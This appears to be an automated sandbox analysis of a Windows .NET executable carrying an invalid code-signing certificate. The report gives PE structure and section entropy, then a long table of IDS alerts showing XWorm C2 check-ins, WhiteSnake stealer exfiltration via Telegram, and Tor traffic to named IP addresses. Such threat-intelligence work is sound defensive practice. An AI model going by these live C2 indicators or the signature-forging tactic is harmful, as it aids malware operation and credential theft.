                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x669EC730 [Mon Jul 22 20:55:12 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                          Subject Chain
                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                          Version:3
                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6e5380x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x1074.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x6e4000x3608
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x6c5900x6c8004aebf293bc9c05213b392f5101e1ae5aFalse0.9699943296370968data7.980169660583914IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x700000x10740x140050f7a9234169306752bc5aa701099f82False0.55703125data5.731086821483001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x720000xc0x40034a5619fbd670711a875b8b391c5dafeFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x700c80xc60PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7528409090909091
                                                                          RT_GROUP_ICON0x70d380x14data1.05
                                                                          RT_VERSION0x70d5c0x312data0.46055979643765904

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                          2024-07-23T15:48:17.144145+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:08.115309+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:00.111643+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.704467+0200TCP2522818ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 81999934973095.217.36.40192.168.2.5
                                                                          2024-07-23T15:47:14.425934+0200TCP2522164ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 165844349725140.78.100.15192.168.2.5
                                                                          2024-07-23T15:47:29.089437+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:08.101444+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:55.809501+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.053785+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:30.643021+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:17.025178+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:55.344407+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:51.219704+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:42.994902+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:41.798109+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:34.426686+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:18.078854+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:17.388843+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:20.859622+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:55.351253+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:08.098568+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:32.752127+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:38.301171+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:42.997421+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:08.085517+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:46:58.158263+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:32.600904+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:49.516790+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:17.520888+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:17.164999+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:06.169338+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:17.385354+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:00.114263+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:08.401044+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:20.861210+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:07.878611+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:47.627563+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:28.550933+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:37.604989+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:59.812040+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:17.026862+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.461487+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:55.353080+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:06.117172+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:14.913229+0200TCP2045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)497268080192.168.2.5185.119.118.59
                                                                          2024-07-23T15:49:59.814406+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:29.251375+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.351289+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:28.384423+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:39.446554+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:17.517191+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:17.303596+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:47.625590+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.326585+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:46:58.148752+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.152311+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:27.721599+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.153707+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:28.552358+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.329349+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:29.253527+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.193724+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:34.559540+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:34.423220+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:06.676618+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:32.474944+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:36.175089+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:54.116548+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.704444+0200TCP2522292ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 293900149729193.142.146.239192.168.2.5
                                                                          2024-07-23T15:50:06.394192+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:06.167055+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.144575+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:18.223750+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:06.553033+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:55.572417+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:34.557718+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:36.170319+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:39.444702+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:17.148849+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:06.678354+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:32.602452+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:16.320433+0200TCP2045869ET MALWARE WhiteSnake Stealer Telegram Checkin49727443192.168.2.5149.154.167.220
                                                                          2024-07-23T15:50:44.963735+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:09.598849+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049423193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.102331+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:40.566832+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:55.345362+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:50.399527+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:55.807861+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:41.800241+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:39.086242+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:28.386113+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.191958+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:50.397806+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:08.078426+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.115543+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:38.107132+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:39.083440+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:40.565173+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:07.876303+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:18.076637+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.549041+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:37.602487+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.764664+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.463847+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:51.222887+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:51:06.142825+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:38.084252+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:32.750243+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.255943+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:38.083497+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.760725+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:17.163102+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:54.118696+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:55.576858+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:30.641371+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:35.327551+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:44.964749+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:49.518442+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:18.220763+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.398996+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:38.094629+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:35.052337+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:27.727759+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:32.477225+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:16.818128+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:08.402839+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:16.820131+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:17.302006+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
